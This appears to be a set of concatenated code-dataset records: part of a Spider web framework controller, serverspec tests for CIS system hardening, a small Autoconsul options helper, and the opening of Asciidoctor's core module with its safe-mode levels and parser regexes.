# @param [*Symbol] A list of methods
# @return [Array] All defined controller actions
def controller_actions(*methods)
if (methods.length > 0)
@controller_actions ||= []
@controller_actions += methods
end
@controller_actions
end
def controller_action(method, params)
@controller_actions ||= []
@controller_actions << method
@controller_action_params ||= {}
@controller_action_params[method] = params
end
# @return [bool] true if the method is a controller action
def controller_action?(method)
return false unless self.method_defined?(method)
return true if default_action && method == default_action.to_sym
if @controller_actions
res = @controller_actions.include?(method)
if (!res)
Spider.logger.info("Method #{method} is not a controller action for #{self}")
end
return res
else
return true
end
end
# Finds a resource in the context of the controller's app
# See {Spider.find_resource}
            # @param [Symbol] type
            # @param [String] name
# @param [String] cur_path Current path: if set, will be used to resolve relative paths
# @return [Resource]
def find_resource(type, name, cur_path=nil)
Spider.find_resource(type, name, cur_path, self)
end
# Returns the path of a resource, or nil if none is found
# See {Controller.find_resource}
            # @param [Symbol] type
            # @param [String] name
            # @param [String] cur_path Current path: if set, will be used to resolve relative paths
            # @return [String, nil] The resource path, or nil if none is found
def find_resource_path(type, name, cur_path=nil)
res = Spider.find_resource(type, name, cur_path, self)
return res ? res.path : nil
end
# @param [String] action Additional action to get path for
# @return [String] The canonical URL path for this controller
def route_path(action=nil)
u = @default_route || ''
u += "/#{action}" if action
if @default_dispatcher && @default_dispatcher != self
u = @default_dispatcher.route_path(u)
elsif self.app
u = self.app.route_path(u)
end
u
end
# Returns the full URL for the Controller
# The Controller's implementation returns the route_path.
#
# However, the HTTPMixin will override this method to return a full http url;
# other mixins can override the method in different ways.
# @param [String] action Additional action to get path for
# @return [String] The canonical URL for this controller
def url(action=nil)
route_path(action)
end
alias :route_url :url
end
define_annotation(:action) { |k, m, params| k.controller_action(m, params) }
# @return [Spider::Request]
attr_reader :request
# @return [Spider::Response]
attr_reader :response
# @return [Symbol] The method currently set to be executed, if any
attr_reader :executed_method
# @return [Scene]
attr_reader :scene
# @return [String] Action used to reach this controller in the dispatch chain
attr_accessor :dispatch_action
# @return [bool] True if the controller is the target of the current action
attr_accessor :is_target
# Constructor. Note: you can use the {Controller#init} method for custom
        # initialization, instead of overriding this method
# @param [Spider::Request] request
# @param [Spider::Response] response
# @param [scene]
def initialize(request, response, scene=nil)
@request = request
@response = response
@scene = scene || get_scene
@dispatch_path = ''
@is_target = true
init
end
# Override this for controller initialization
# @return [void]
def init
end
# @return [String]
def inspect
self.class.to_s
end
# @return [String] The actual action path used to reach this Controller
def request_path
act = @dispatch_action || ''
if (@dispatch_previous)
prev = @dispatch_previous.call_path
act = prev+'/'+act unless prev.empty?
end
return ('/'+act).gsub(/\/+/, '/').sub(/\/$/, '')
end
alias :call_path :request_path
# Returns the method to call on the controller given an action, and the arguments
# that should be passed to it.
# @param [String] action
# @return [Array] A two elements array, containing the method, and additional arguments
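        # A hedged illustration of the return shape (action strings hypothetical):
        #   get_action_method('edit/5')    # => [:edit, ["5"]]
        #   get_action_method('show.json') # => [:show, nil]
        #   get_action_method('')          # => [:index, nil]  (falls back to the default action)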
def get_action_method(action)
method = nil
additional_arguments = nil
if (action =~ /^([^:]+)(:.+)$/)
method = $1
elsif (action =~ /^([^\/]+)\/(.+)$/) # methods followed by a slash
method = $1
additional_arguments = [$2]
else
method = action
end
method = method[0..-2] if !method.blank? && method[-1].chr == '/'
method, rest = method.split('.', 2) if method
method = self.class.default_action if !method || method.empty?
return nil if method.empty?
return [method.to_sym, additional_arguments]
end
# Returns true if this controller is the final target for the current action, that is, if it does not
# dispatch to any route
# @return [bool] True if the controller is the final target
def action_target?
!@dispatch_next[@call_path] || @dispatch_next[@call_path].dest == self \
|| @dispatch_next[@call_path].dest == self.class
end
# @return [bool] false if the target of the call is a widget, true otherwise
def is_target?
@is_target
end
# If the site supports SSL, returns the #https_url; otherwise, the #http_url
def self.http_s_url(action=nil)
(Spider.site.blank? ? "" : Spider.site.http_s_url) + route_path(action)
end
        # Method that forces https
def self.https_url(action=nil)
return self.http_s_url(action) if Spider.runmode == 'devel'
Spider.site.https_url + route_path(action)
end
# The main controller's execution method. The Controller will dispatch
# to another controller if a route is set; otherwise, it will call the
# method that should be executed according to action.
#
# This method can be overridden in subclasses, but remember to call super,
# or the dispatch chain will stop!
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def execute(action='', *arguments)
return if @__done
debug("Controller #{self} executing #{action} with arguments #{arguments}")
catch(:done) do
if can_dispatch?(:execute, action)
d_next = dispatch_next(action)
#run_chain(:execute, action, *arguments)
# shortcut route to self
return do_dispatch(:execute, action) if d_next.dest != self
arguments = d_next.params
end
if d_next && d_next.dest == self
set_executed_method(d_next.action)
end
if @executed_method
meth = self.method(@executed_method)
args = arguments + @executed_method_arguments
@current_action = action
arity = meth.arity
unless arity == -1
arity = (-arity + 1) if arity < 0
args = arity == 0 ? [] : args[0..(arity-1)]
args = [nil] if meth.arity == 1 && args.empty?
end
Spider.logger.info("Executing: #{self.class.name}##{@executed_method}.#{@request.format}")
spider_main_controller_send = true
send(@executed_method, *args)
else
raise NotFound.new(action)
end
end
end
# Helper method, that calls and propagates #before
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def call_before(action='', *arguments)
return if respond_to?(:serving_static?) && self.serving_static?
@call_path = action
before(action, *arguments)
catch(:done) do
#debug("#{self} before")
d_next = dispatch_next(action)
unless d_next && d_next.obj == self
do_dispatch(:call_before, action, *arguments)
end
end
end
# This method can be implemented by Controllers, and will be called
# on the controller chain before the execute method.
#
# This method is usually reserved for preprocessing that does not
        # output to the browser, to allow other controllers in the chain to set response
# headers.
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def before(action='', *arguments)
end
# Helper method, that calls and propagates #after
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def call_after(action='', *arguments)
return if respond_to?(:serving_static?) && self.serving_static?
after(action, *arguments)
catch(:done) do
d_next = dispatch_next(action)
unless d_next && d_next.obj == self
do_dispatch(:call_after, action, *arguments)
end
end
end
# This method can be implemented by Controllers, and will be called
# on the controller chain after the execute method.
#
# If the webserver supports it, this method will be called after the response
# has been returned to the browser; so, it's suitable for post processing.
# If you aren't using a threaded web server, though, keep in mind that the
# process won't be available to service other requests.
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def after(action='', *arguments)
end
# @return [bool] True if the controller is done, and should not continue dispatching.
def done?
@__done
end
# Stops the execution of the controller chain
# @return [void]
def done
self.done = true
throw :done
end
# Sets the controller chain's "done" state
# @param [bool] val
# @return [void]
def done=(val)
@__done = val
@dispatch_previous.done = val if @dispatch_previous
end
# Checks if an action responds to given route conditions. Is called by
# {Dispatcher#do_dispatch}.
# The default implementation calls Controller.check_action, which in turn is mixed in
# from {Dispatcher::ClassMethods#check_action}
# @param [String] action
# @param [Array] c An array of route conditions
# @return [bool]
def check_action(action, c)
self.class.check_action(action, c)
end
# Returns a new Scene instance for use in the controller.
# @param [Hash] scene Hash to construct the scene from
# @return [Scene]
def get_scene(scene=nil)
scene = Scene.new(scene) if scene.class == Hash
scene ||= Scene.new
return scene
end
# Sets controller information on a scene
# @param [Scene] scene
# @return [Scene]
def prepare_scene(scene)
req_path = @request.path
req_path += 'index' if !req_path.blank? && req_path[-1].chr == '/'
scene.request = {
:path => @request.path,
:page_path => req_path
}
scene.controller = {
:request_path => request_path,
:class => self.class
}
scene.content = {}
return scene
end
# See {Controller.controller_action?}
# @return [bool] True if the method is a controller action for the class
def controller_action?(method)
self.class.controller_action?(method)
end
protected
# Instantiates an object dispatched by a route
# @param [Route]
# @return [Controller]
def dispatched_object(route)
klass = route.dest
if klass.class != Class
if klass == self # route to self
set_executed_method(route.action)
end
return klass
elsif klass == self.class
self.set_action(route.action)
return self
end
obj = klass.new(@request, @response, @scene)
obj.dispatch_action = route.matched || ''
# FIXME: this is not clean
obj.set_action(route.action)
# obj.dispatch_path = @dispatch_path + route.path
return obj
end
# Given an action, sets the executed method unless it can be dispatched
# @param [String] action
# @return [Symbol|nil] The executed method, if it was set, or nil
def set_action(action)
@executed_method = nil
@executed_method_arguments = nil
if !can_dispatch?(:execute, action)
return set_executed_method(action)
end
nil
end
# Given an action, sets executed_method and executed_method_arguments
# @param [String] action
# @return [Symbol] The executed_method
def set_executed_method(action)
method, additional_arguments = get_action_method(action)
if method && controller_action?(method)
@executed_method = method.to_sym
@executed_method_arguments = additional_arguments || []
end
return @executed_method
end
        # This method can be overridden by subclasses, to provide custom handling of
# exceptions
# @param [Exception]
# @return [void]
def try_rescue(exc)
raise exc
end
private
# Overrides {Dispatcher#get_route}, setting the action for nil routes
# @param [String] path
def get_route(*args)
route = super
return route unless route
action = route.path.split('/').first
action_method, action_params = get_action_method(action)
if route.nil_route && !action.blank? && self.respond_to?(action_method)
route.action = action
end
route
end
end
end
require 'spiderfw/widget/widget'
require 'spiderfw/tag/tag'
| 39.994012 | 110 | 0.554025 |
39c189ef8e8690ee133493c6e9913b0bc6ba463b | 3,324 | require 'spec_helper_acceptance'
# Ensure time synchronization is in use - Section 2.2.1.1
describe package('ntp') do
it { should be_installed }
end
describe package('chrony') do
it { should be_installed }
end
# Ensure ntp is configured - Section 2.2.1.2
describe file('/etc/ntp.conf') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
end
describe file('/etc/sysconfig/ntpd') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
end
describe file('/usr/lib/systemd/system/ntpd.service') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
  its(:content) { should match /ExecStart=\/usr\/sbin\/ntpd -u ntp:ntp \$OPTIONS/ }
end
# Ensure Chrony is configured - Section 2.2.1.3
describe file('/etc/chrony.conf') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
end
describe file('/etc/sysconfig/chronyd') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
its(:content) { should match /OPTIONS="-u chrony"/ }
end
# Ensure X Window System is not installed - Section 2.2.2
describe package('xorg-x11-server-Xorg') do
it { should_not be_installed }
end
# Ensure Avahi Server is not enabled - Section 2.2.3
describe service('avahi-daemon') do
it { should_not be_running }
end
# Ensure CUPS is not enabled - Section 2.2.4
describe service('cups') do
it { should_not be_running }
end
# Ensure DHCP Server is not enabled - Section 2.2.5
describe service('dhcpd') do
  it { should_not be_running }
end
# Ensure LDAP Server is not enabled - Section 2.2.6
describe service('slapd') do
it { should_not be_running }
end
# Ensure NFS and RPC are not enabled - Section 2.2.7
describe service('nfs') do
it { should_not be_running }
end
describe service('nfs-server') do
it { should_not be_running }
end
describe service('rpcbind') do
it { should_not be_running }
end
# Ensure DNS Server is not enabled - Section 2.2.8
describe service('named') do
it { should_not be_running }
end
# Ensure FTP Server is not enabled - Section 2.2.9
describe service('vsftpd') do
it { should_not be_running }
end
# Ensure HTTP Server is not enabled - Section 2.2.10
describe service('httpd') do
it { should_not be_running }
end
# Ensure IMAP and POP3 Server are not enabled - Section 2.2.11
describe service('dovecot') do
it { should_not be_running }
end
# Ensure Samba is not enabled - Section 2.2.12
describe service('smb') do
it { should_not be_running }
end
# Ensure HTTP Proxy Server is not enabled - Section 2.2.13
describe service('squid') do
it { should_not be_running }
end
# Ensure SNMP Server is not enabled - Section 2.2.14
describe service('snmpd') do
it { should_not be_running }
end
# Ensure MTA is configured for local-only mode - Section 2.2.15
describe file('/etc/postfix/main.cf') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644}
end | 25.569231 | 84 | 0.692238 |
e808fbe7168eec68188405770cd7c236bae0d4a0 | 317 | module Autoconsul
module Helpers
def self.options(spec)
# This will convert a hash of format { 'option' => 'option_value' }
# into a string with the expected format for command line:
      # --option option_value
spec.reduce(String.new) { |r, (o, v)| r << "--#{o} #{v} " }
end
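    # Hedged example (option names hypothetical):
    #   Autoconsul::Helpers.options('data-dir' => '/tmp/consul', 'bootstrap-expect' => 1)
    #   # => "--data-dir /tmp/consul --bootstrap-expect 1 "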
end
end
| 28.818182 | 73 | 0.602524 |
380309c17cee3ca7a26b4f2b2ccf8be2ced458f8 | 55,160 | # frozen_string_literal: true
require 'set'
# NOTE RUBY_ENGINE == 'opal' conditional blocks like this are filtered by the Opal preprocessor
if RUBY_ENGINE == 'opal'
# this require is satisfied by the Asciidoctor.js build; it augments the Ruby environment for Asciidoctor.js
require 'asciidoctor/js'
else
autoload :Base64, 'base64'
require 'cgi/util'
autoload :OpenURI, 'open-uri'
autoload :Pathname, 'pathname'
autoload :StringScanner, 'strscan'
autoload :URI, 'uri'
end
# Public: Methods for parsing AsciiDoc input files and converting documents
# using eRuby templates.
#
# AsciiDoc documents comprise a header followed by zero or more sections.
# Sections are composed of blocks of content. For example:
#
# = Doc Title
#
# == Section 1
#
# This is a paragraph block in the first section.
#
# == Section 2
#
# This section has a paragraph block and an olist block.
#
# . Item 1
# . Item 2
#
# Examples:
#
# Use built-in converter:
#
# Asciidoctor.convert_file 'sample.adoc'
#
# Use custom (Tilt-supported) templates:
#
# Asciidoctor.convert_file 'sample.adoc', template_dir: 'path/to/templates'
#
module Asciidoctor
# alias the RUBY_ENGINE constant inside the Asciidoctor namespace and define a precomputed alias for runtime
RUBY_ENGINE_OPAL = (RUBY_ENGINE = ::RUBY_ENGINE) == 'opal'
module SafeMode
# A safe mode level that disables any of the security features enforced
# by Asciidoctor (Ruby is still subject to its own restrictions).
UNSAFE = 0;
# A safe mode level that closely parallels safe mode in AsciiDoc. This value
# prevents access to files which reside outside of the parent directory of
# the source file and disables any macro other than the include::[] directive.
SAFE = 1;
# A safe mode level that disallows the document from setting attributes
# that would affect the conversion of the document, in addition to all the
# security features of SafeMode::SAFE. For instance, this level forbids
# changing the backend or source-highlighter using an attribute defined
# in the source document header. This is the most fundamental level of
# security for server deployments (hence the name).
SERVER = 10;
# A safe mode level that disallows the document from attempting to read
# files from the file system and including the contents of them into the
    # document, in addition to all the security features of SafeMode::SERVER.
# For instance, this level disallows use of the include::[] directive and the
# embedding of binary content (data uri), stylesheets and JavaScripts
# referenced by the document.(Asciidoctor and trusted extensions may still
# be allowed to embed trusted content into the document).
#
# Since Asciidoctor is aiming for wide adoption, this level is the default
# and is recommended for server deployments.
SECURE = 20;
# A planned safe mode level that disallows the use of passthrough macros and
# prevents the document from setting any known attributes, in addition to all
# the security features of SafeMode::SECURE.
#
# Please note that this level is not currently implemented (and therefore not
# enforced)!
#PARANOID = 100;
@names_by_value = {}.tap {|accum| (constants false).each {|sym| accum[const_get sym, false] = sym.to_s.downcase } }
def self.value_for_name name
const_get name.upcase, false
end
def self.name_for_value value
@names_by_value[value]
end
def self.names
@names_by_value.values
end
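    # A hedged illustration of the lookup helpers above:
    #   Asciidoctor::SafeMode.value_for_name 'server' # => 10
    #   Asciidoctor::SafeMode.name_for_value 20       # => 'secure'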
end
# Flags to control compliance with the behavior of AsciiDoc
module Compliance
@keys = ::Set.new
class << self
attr_reader :keys
# Defines a new compliance key and assigns an initial value.
def define key, value
instance_variable_set %(@#{key}), value
singleton_class.send :attr_accessor, key
@keys << key
nil
end
end
# AsciiDoc terminates paragraphs adjacent to
# block content (delimiter or block attribute list)
# This option allows this behavior to be modified
# TODO what about literal paragraph?
# Compliance value: true
define :block_terminates_paragraph, true
# AsciiDoc does not parse paragraphs with a verbatim style
# (i.e., literal, listing, source, verse) as verbatim content.
    # This option allows this behavior to be modified
# Compliance value: false
define :strict_verbatim_paragraphs, true
# AsciiDoc supports both atx (single-line) and setext (underlined) section titles.
# This option can be used to disable the setext variant.
# Compliance value: true
define :underline_style_section_titles, true
# Asciidoctor will unwrap the content in a preamble
# if the document has a title and no sections.
# Compliance value: false
define :unwrap_standalone_preamble, true
# AsciiDoc drops lines that contain references to missing attributes.
# This behavior is not intuitive to most writers
# Compliance value: 'drop-line'
define :attribute_missing, 'skip'
    # AsciiDoc drops lines that contain an attribute unassignment.
# This behavior may need to be tuned depending on the circumstances.
# Compliance value: 'drop-line'
define :attribute_undefined, 'drop-line'
# Asciidoctor will allow the id, role and options to be set
# on blocks using a shorthand syntax (e.g., #idname.rolename%optionname)
# Compliance value: false
define :shorthand_property_syntax, true
# Asciidoctor will attempt to resolve the target of a cross reference by
# matching its reference text (reftext or title) (e.g., <<Section Title>>)
# Compliance value: false
define :natural_xrefs, true
# Asciidoctor will start counting at the following number
# when creating a unique id when there is a conflict
# Compliance value: 2
define :unique_id_start_index, 2
# Asciidoctor will recognize commonly-used Markdown syntax
# to the degree it does not interfere with existing
# AsciiDoc syntax and behavior.
# Compliance value: false
define :markdown_syntax, true
end
# The absolute root directory of the Asciidoctor RubyGem
ROOT_DIR = ::File.dirname ::File.absolute_path __dir__ unless defined? ROOT_DIR
# The absolute lib directory of the Asciidoctor RubyGem
LIB_DIR = ::File.join ROOT_DIR, 'lib'
# The absolute data directory of the Asciidoctor RubyGem
DATA_DIR = ::File.join ROOT_DIR, 'data'
# The user's home directory, as best we can determine it
USER_HOME = ::Dir.home
# The newline character used for output; stored in constant table as an optimization
LF = ?\n
# The null character to use for splitting attribute values
NULL = ?\0
# String for matching tab character
TAB = ?\t
# Maximum integer value for "boundless" operations; equal to MAX_SAFE_INTEGER in JavaScript
MAX_INT = 9007199254740991
# Alias UTF_8 encoding for convenience / speed
UTF_8 = ::Encoding::UTF_8
# Byte arrays for UTF-* Byte Order Marks
BOM_BYTES_UTF_8 = [0xef, 0xbb, 0xbf]
BOM_BYTES_UTF_16LE = [0xff, 0xfe]
BOM_BYTES_UTF_16BE = [0xfe, 0xff]
# The mode to use when opening a file for reading
FILE_READ_MODE = RUBY_ENGINE_OPAL ? 'r' : 'rb:utf-8:utf-8'
# The mode to use when opening a URI for reading
URI_READ_MODE = FILE_READ_MODE
# The mode to use when opening a file for writing
FILE_WRITE_MODE = RUBY_ENGINE_OPAL ? 'w' : 'w:utf-8'
# The default document type
# Can influence markup generated by the converters
DEFAULT_DOCTYPE = 'article'
# The backend determines the format of the converted output, default to html5
DEFAULT_BACKEND = 'html5'
DEFAULT_STYLESHEET_KEYS = ['', 'DEFAULT'].to_set
DEFAULT_STYLESHEET_NAME = 'asciidoctor.css'
# Pointers to the preferred version for a given backend.
BACKEND_ALIASES = {
'html' => 'html5',
'docbook' => 'docbook5'
}
# Default page widths for calculating absolute widths
DEFAULT_PAGE_WIDTHS = {
'docbook' => 425
}
# Default extensions for the respective base backends
DEFAULT_EXTENSIONS = {
'html' => '.html',
'docbook' => '.xml',
'pdf' => '.pdf',
'epub' => '.epub',
'manpage' => '.man',
'asciidoc' => '.adoc'
}
# Set of file extensions recognized as AsciiDoc documents (stored as a truth hash)
ASCIIDOC_EXTENSIONS = {
'.adoc' => true,
'.asciidoc' => true,
'.asc' => true,
'.ad' => true,
# TODO .txt should be deprecated
'.txt' => true
}
SETEXT_SECTION_LEVELS = {
'=' => 0,
'-' => 1,
'~' => 2,
'^' => 3,
'+' => 4
}
ADMONITION_STYLES = ['NOTE', 'TIP', 'IMPORTANT', 'WARNING', 'CAUTION'].to_set
ADMONITION_STYLE_HEADS = ['N', 'T', 'I', 'W', 'C'].to_set
PARAGRAPH_STYLES = ['comment', 'example', 'literal', 'listing', 'normal', 'open', 'pass', 'quote', 'sidebar', 'source', 'verse', 'abstract', 'partintro'].to_set
VERBATIM_STYLES = ['literal', 'listing', 'source', 'verse'].to_set
DELIMITED_BLOCKS = {
'--' => [:open, ['comment', 'example', 'literal', 'listing', 'pass', 'quote', 'sidebar', 'source', 'verse', 'admonition', 'abstract', 'partintro'].to_set],
'----' => [:listing, ['literal', 'source'].to_set],
'....' => [:literal, ['listing', 'source'].to_set],
'====' => [:example, ['admonition'].to_set],
'****' => [:sidebar, ::Set.new],
'____' => [:quote, ['verse'].to_set],
'++++' => [:pass, ['stem', 'latexmath', 'asciimath'].to_set],
'|===' => [:table, ::Set.new],
',===' => [:table, ::Set.new],
':===' => [:table, ::Set.new],
'!===' => [:table, ::Set.new],
'////' => [:comment, ::Set.new],
'```' => [:fenced_code, ::Set.new]
}
DELIMITED_BLOCK_HEADS = {}.tap {|accum| DELIMITED_BLOCKS.each_key {|k| accum[k.slice 0, 2] = true } }
DELIMITED_BLOCK_TAILS = {}.tap {|accum| DELIMITED_BLOCKS.each_key {|k| accum[k] = k[k.length - 1] if k.length == 4 } }
LAYOUT_BREAK_CHARS = {
'\'' => :thematic_break,
'<' => :page_break
}
MARKDOWN_THEMATIC_BREAK_CHARS = {
'-' => :thematic_break,
'*' => :thematic_break,
'_' => :thematic_break
}
HYBRID_LAYOUT_BREAK_CHARS = LAYOUT_BREAK_CHARS.merge MARKDOWN_THEMATIC_BREAK_CHARS
#LIST_CONTEXTS = [:ulist, :olist, :dlist, :colist]
NESTABLE_LIST_CONTEXTS = [:ulist, :olist, :dlist]
# TODO validate use of explicit style name above ordered list (this list is for selecting an implicit style)
ORDERED_LIST_STYLES = [:arabic, :loweralpha, :lowerroman, :upperalpha, :upperroman] #, :lowergreek]
ORDERED_LIST_KEYWORDS = {
#'arabic' => '1',
#'decimal' => '1',
'loweralpha' => 'a',
'lowerroman' => 'i',
#'lowergreek' => 'a',
'upperalpha' => 'A',
'upperroman' => 'I'
}
ATTR_REF_HEAD = '{'
LIST_CONTINUATION = '+'
# NOTE AsciiDoc Python allows + to be preceded by TAB; Asciidoctor does not
HARD_LINE_BREAK = ' +'
LINE_CONTINUATION = ' \\'
LINE_CONTINUATION_LEGACY = ' +'
BLOCK_MATH_DELIMITERS = {
asciimath: ['\$', '\$'],
latexmath: ['\[', '\]'],
}
INLINE_MATH_DELIMITERS = {
asciimath: ['\$', '\$'],
latexmath: ['\(', '\)'],
}
(STEM_TYPE_ALIASES = {
'latexmath' => 'latexmath',
'latex' => 'latexmath',
'tex' => 'latexmath'
}).default = 'asciimath'
FONT_AWESOME_VERSION = '4.7.0'
HIGHLIGHT_JS_VERSION = '9.15.6'
MATHJAX_VERSION = '2.7.5'
  # attributes which can be changed within the content of the document (but not
  # the header) because they have semantic meaning; e.g., sectnums
FLEXIBLE_ATTRIBUTES = ['sectnums']
# A collection of regular expressions used by the parser.
#
# NOTE The following pattern, which appears frequently, captures the
# contents between square brackets, ignoring escaped closing brackets
# (closing brackets prefixed with a backslash '\' character)
#
# Pattern: \[(|#{CC_ALL}*?[^\\])\]
# Matches: [enclosed text] and [enclosed [text\]], not [enclosed text \\] or [\\] (as these require a trailing space)
#
# NOTE \w only matches ASCII word characters, whereas [[:word:]] or \p{Word} matches any character in the Unicode word category.
#(pseudo)module Rx
## Regular expression character classes (to ensure regexp compatibility between Ruby and JavaScript)
## CC stands for "character class", CG stands for "character class group"
unless RUBY_ENGINE == 'opal'
# CC_ALL is any character, including newlines (must be accompanied by multiline regexp flag)
CC_ALL = '.'
# CC_ANY is any character except newlines
CC_ANY = '.'
CC_EOL = '$'
CC_ALPHA = CG_ALPHA = '\p{Alpha}'
CC_ALNUM = CG_ALNUM = '\p{Alnum}'
CG_BLANK = '\p{Blank}'
CC_WORD = CG_WORD = '\p{Word}'
end
## Document header
# Matches the author info line immediately following the document title.
#
# Examples
#
# Doc Writer <[email protected]>
# Mary_Sue Brontë
#
AuthorInfoLineRx = /^(#{CG_WORD}[#{CC_WORD}\-'.]*)(?: +(#{CG_WORD}[#{CC_WORD}\-'.]*))?(?: +(#{CG_WORD}[#{CC_WORD}\-'.]*))?(?: +<([^>]+)>)?$/
# Matches the revision info line, which appears immediately following
# the author info line beneath the document title.
#
# Examples
#
# v1.0
# 2013-01-01
# v1.0, 2013-01-01: Ring in the new year release
# 1.0, Jan 01, 2013
#
RevisionInfoLineRx = /^(?:[^\d{]*(#{CC_ANY}*?),)? *(?!:)(#{CC_ANY}*?)(?: *(?!^),?: *(#{CC_ANY}*))?$/
# Matches the title and volnum in the manpage doctype.
#
# Examples
#
# = asciidoctor(1)
# = asciidoctor ( 1 )
#
ManpageTitleVolnumRx = /^(#{CC_ANY}+?) *\( *(#{CC_ANY}+?) *\)$/
# Matches the name and purpose in the manpage doctype.
#
# Examples
#
# asciidoctor - converts AsciiDoc source files to HTML, DocBook and other formats
#
ManpageNamePurposeRx = /^(#{CC_ANY}+?) +- +(#{CC_ANY}+)$/
## Preprocessor directives
# Matches a conditional preprocessor directive (e.g., ifdef, ifndef, ifeval and endif).
#
# Examples
#
# ifdef::basebackend-html[]
# ifndef::theme[]
# ifeval::["{asciidoctor-version}" >= "0.1.0"]
# ifdef::asciidoctor[Asciidoctor!]
# endif::theme[]
# endif::basebackend-html[]
# endif::[]
#
ConditionalDirectiveRx = /^(\\)?(ifdef|ifndef|ifeval|endif)::(\S*?(?:([,+])\S*?)?)\[(#{CC_ANY}+)?\]$/
# Matches a restricted (read as safe) eval expression.
#
# Examples
#
# "{asciidoctor-version}" >= "0.1.0"
#
EvalExpressionRx = /^(#{CC_ANY}+?) *([=!><]=|[><]) *(#{CC_ANY}+)$/
# Matches an include preprocessor directive.
#
# Examples
#
# include::chapter1.ad[]
# include::example.txt[lines=1;2;5..10]
#
IncludeDirectiveRx = /^(\\)?include::([^\[][^\[]*)\[(#{CC_ANY}+)?\]$/
# Matches a trailing tag directive in an include file.
#
# Examples
#
# // tag::try-catch[]
# try {
# someMethod();
# catch (Exception e) {
# log(e);
# }
# // end::try-catch[]
# NOTE m flag is required for Asciidoctor.js
TagDirectiveRx = /\b(?:tag|(e)nd)::(\S+?)\[\](?=$|[ \r])/m
## Attribute entries and references
# Matches a document attribute entry.
#
# Examples
#
# :foo: bar
# :First Name: Dan
# :sectnums!:
# :!toc:
# :long-entry: Attribute value lines ending in ' \' \
# are joined together as a single value, \
# collapsing the line breaks and indentation to \
# a single space.
#
AttributeEntryRx = /^:(!?#{CG_WORD}[^:]*):(?:[ \t]+(#{CC_ANY}*))?$/
# Matches invalid characters in an attribute name.
InvalidAttributeNameCharsRx = /[^-#{CC_WORD}]/
# Matches a pass inline macro that surrounds the value of an attribute
# entry once it has been parsed.
#
# Examples
#
# pass:[text]
# pass:a[{a} {b} {c}]
#
if RUBY_ENGINE == 'opal'
# NOTE In JavaScript, ^ and $ match the boundaries of the string when the m flag is not set
AttributeEntryPassMacroRx = /^pass:([a-z]+(?:,[a-z]+)*)?\[(#{CC_ALL}*)\]$/
else
AttributeEntryPassMacroRx = /\Apass:([a-z]+(?:,[a-z]+)*)?\[(.*)\]\Z/m
end
# Matches an inline attribute reference.
#
# Examples
#
# {foobar} or {app_name} or {product-version}
# {counter:sequence-name:1}
# {set:foo:bar}
# {set:name!}
#
AttributeReferenceRx = /(\\)?\{(#{CG_WORD}[-#{CC_WORD}]*|(set|counter2?):#{CC_ANY}+?)(\\)?\}/
## Paragraphs and delimited blocks
# Matches an anchor (i.e., id + optional reference text) on a line above a block.
#
# Examples
#
# [[idname]]
# [[idname,Reference Text]]
#
BlockAnchorRx = /^\[\[(?:|([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+))?)\]\]$/
# Matches an attribute list above a block element.
#
# Examples
#
# # strictly positional
# [quote, Adam Smith, Wealth of Nations]
#
# # name/value pairs
# [NOTE, caption="Good to know"]
#
# # as attribute reference
# [{lead}]
#
BlockAttributeListRx = /^\[(|[#{CC_WORD}.#%{,"']#{CC_ANY}*)\]$/
# A combined pattern that matches either a block anchor or a block attribute list.
#
# TODO this one gets hit a lot, should be optimized as much as possible
BlockAttributeLineRx = /^\[(?:|[#{CC_WORD}.#%{,"']#{CC_ANY}*|\[(?:|[#{CC_ALPHA}_:][#{CC_WORD}:.-]*(?:, *#{CC_ANY}+)?)\])\]$/
# Matches a title above a block.
#
# Examples
#
# .Title goes here
#
BlockTitleRx = /^\.(\.?[^ \t.]#{CC_ANY}*)$/
# Matches an admonition label at the start of a paragraph.
#
# Examples
#
# NOTE: Just a little note.
# TIP: Don't forget!
#
AdmonitionParagraphRx = /^(#{ADMONITION_STYLES.to_a.join '|'}):[ \t]+/
# Matches a literal paragraph, which is a line of text preceded by at least one space.
#
# Examples
#
# <SPACE>Foo
# <TAB>Foo
LiteralParagraphRx = /^([ \t]+#{CC_ANY}*)$/
# Matches a comment block.
#
# Examples
#
# ////
# This is a block comment.
# It can span one or more lines.
# ////
#CommentBlockRx = %r(^/{4,}$)
# Matches a comment line.
#
# Examples
#
# // note to author
#
#CommentLineRx = %r(^//(?=[^/]|$))
## Section titles
# Matches an Atx (single-line) section title.
#
# Examples
#
# == Foo
# // ^ a level 1 (h2) section title
#
# == Foo ==
# // ^ also a level 1 (h2) section title
#
AtxSectionTitleRx = /^(=={0,5})[ \t]+(#{CC_ANY}+?)(?:[ \t]+\1)?$/
# Matches an extended Atx section title that includes support for the Markdown variant.
ExtAtxSectionTitleRx = /^(=={0,5}|#\#{0,5})[ \t]+(#{CC_ANY}+?)(?:[ \t]+\1)?$/
# Matches the title only (first line) of an Setext (two-line) section title.
# The title cannot begin with a dot and must have at least one alphanumeric character.
SetextSectionTitleRx = /^((?!\.)#{CC_ANY}*?#{CG_ALNUM}#{CC_ANY}*)$/
# Matches an anchor (i.e., id + optional reference text) inside a section title.
#
# Examples
#
# Section Title [[idname]]
# Section Title [[idname,Reference Text]]
#
InlineSectionAnchorRx = / (\\)?\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+))?\]\]$/
# Matches invalid ID characters in a section title.
#
# NOTE uppercase chars not included since expression is only run on a lowercase string
InvalidSectionIdCharsRx = /<[^>]+>|&(?:[a-z][a-z]+\d{0,2}|#\d\d\d{0,4}|#x[\da-f][\da-f][\da-f]{0,3});|[^ #{CC_WORD}\-.]+?/
# Matches an explicit section level style like sect1
#
